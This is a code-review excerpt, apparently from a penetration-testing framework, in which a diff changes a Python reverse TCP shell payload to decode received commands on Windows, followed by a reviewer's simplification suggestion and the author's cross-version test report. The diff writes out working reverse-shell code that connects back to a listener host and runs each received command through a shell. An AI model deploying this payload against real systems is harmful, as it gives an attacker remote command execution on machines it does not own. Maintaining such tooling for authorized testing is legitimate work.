modules/payloads/singles/python/shell_reverse_tcp.rb

```diff
@@ -45,15 +45,19 @@ def command_string
     cmd = <<~PYTHON
       import socket as s
       import subprocess as r
+      import platform
       so=s.socket(s.AF_INET,s.SOCK_STREAM)
       so.connect(('#{datastore['LHOST']}',#{datastore['LPORT']}))
       while True:
-      	d=so.recv(1024)
-      	if len(d)==0:
-      		break
-      	p=r.Popen(d,shell=True,stdin=r.PIPE,stdout=r.PIPE,stderr=r.PIPE)
-      	o=p.stdout.read()+p.stderr.read()
-      	so.send(o)
+        d=so.recv(1024)
+        if len(d)==0:
+          break
+        if platform.system()=='Windows':
+          p=r.Popen(d.decode('utf-8'),shell=True,stdin=r.PIPE,stdout=r.PIPE,stderr=r.PIPE)
+        else:
+          p=r.Popen(d,shell=True,stdin=r.PIPE,stdout=r.PIPE,stderr=r.PIPE)
```

Comment:
I don't think `Popen` needs to take a bytes argument on non-Windows systems. It'd be worth checking if all this could be simplified by decoding the bytes returned from the socket `recv` call to a string on Python versions 3+.

Reply:
As you have suggested. I have tested whether we can keep the decoded bytes argument for non windows. Tested it on ubuntu-18.04 python 2.7.17 and python 3.6.9
ubuntu-20.04 python 3.8.10 and 3.11.3
I have verified that I got the shell for all the above case. so decoded bytes argument irrespective of platform.